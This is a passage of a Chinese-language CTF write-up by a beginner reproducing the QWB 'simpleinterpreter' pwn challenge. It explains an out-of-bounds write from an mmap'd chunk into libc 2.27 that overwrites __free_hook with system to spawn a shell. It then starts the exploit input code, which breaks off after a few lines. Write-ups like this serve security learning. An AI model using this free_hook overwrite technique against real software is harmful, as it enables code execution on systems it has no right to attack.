对于一个刚入门的三个月的菜鸡pwn手打算按照难度慢慢复现qwb的题目
先simpleinterpreter吧
simpleinterpreter libc 2.27
逆向
法1
方法1参考链接
程序实现了一个 C 语言解释器,可用的关键字如下:
char else enum if int return sizeof while read close printf malloc free memset memcmp exit void main
read close printf malloc free memset memcmp exit 和原生C 函数效果一样
可以尝试一下&和*操作是否存在,存在利用那么更方便
漏洞就是越界,首先用 malloc 一个超大堆块分配到 mmap 内存,然后越界写 libc,将 free_hook 覆盖为 system 地址,然后释放”/bin/sh”即可 getshell(libc 版本是 2.27)
本地好像不行,得到的地址由mmap的第几次得到没有确定下来,导致与基地址偏移无法确定,但是第几次mmap的范围有限,所以如果不断尝试可能成功
该法对应的输入代码如下
main(){
int size;
char* freehook;
char* system;
char* v;
char *binsh;
size = 204800;
binsh="/bin/sh";
v=malloc(size);
freehook